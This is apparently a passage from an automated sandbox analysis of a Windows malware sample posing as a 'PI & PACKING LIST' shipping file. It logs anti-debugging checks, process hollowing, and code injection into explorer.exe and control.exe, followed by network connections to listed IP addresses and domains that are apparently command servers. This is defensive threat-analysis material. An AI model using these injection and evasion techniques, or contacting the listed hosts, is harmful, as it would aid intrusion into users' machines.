      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0130740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0130740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0130740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126A44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012CC450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012CC450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0124849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F14FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01308CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01234F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01234F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126E730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B73D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B73D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125F716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012CFF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012CFF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0130070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0130070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0124FF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01308F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0124EF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01248794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012737F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0123E620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012EFE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0123C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0123C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0123C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01268E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F1608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0124766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01247E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01247E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01247E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01247E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01247E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01247E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012FAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012FAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B46A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01300EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01300EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01300EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012CFE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012616E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012476E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01278EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01308ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012636CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012EFEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 35.78.89.117 80
      Source: C:\Windows\explorer.exeNetwork Connect: 162.43.120.154 80
      Source: C:\Windows\explorer.exeNetwork Connect: 142.250.203.115 80
      Source: C:\Windows\explorer.exeDomain query: www.bengalindex.com
      Source: C:\Windows\explorer.exeDomain query: www.nu2uresale.store
      Source: C:\Windows\explorer.exeNetwork Connect: 209.99.64.33 80
      Source: C:\Windows\explorer.exeDomain query: www.zkjk888.com
      Source: C:\Windows\explorer.exeNetwork Connect: 178.128.239.245 80
      Source: C:\Windows\explorer.exeDomain query: www.p-soils.com
      Source: C:\Windows\explorer.exeDomain query: www.cpitherapy.com
      Source: C:\Windows\explorer.exeDomain query: www.gebouwpas.online
      Sample uses process hollowing technique
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 1360000
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Injects a PE file into a foreign processes
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeMemory written: C:\Users\user\Desktop\PI & PACKING LIST.exe base: 400000 value starts with: 4D5A
      Queues an APC in another process (thread injection)
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeThread APC queued: target process: C:\Windows\explorer.exe
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeThread register set: target process: 3452
      Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3452
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess created: C:\Users\user\Desktop\PI & PACKING LIST.exe C:\Users\user\Desktop\PI & PACKING LIST.exe
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess created: C:\Users\user\Desktop\PI & PACKING LIST.exe C:\Users\user\Desktop\PI & PACKING LIST.exe
      Source: explorer.exe, 00000003.00000000.307333028.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.332009342.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.264215848.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
      Source: explorer.exe, 00000003.00000000.336206655.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.340849752.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.321402743.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000003.00000000.307333028.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.332009342.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.264215848.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000003.00000000.331517747.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.263416995.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
      Source: explorer.exe, 00000003.00000000.307333028.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.332009342.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.264215848.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Users\user\Desktop\PI & PACKING LIST.exe VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
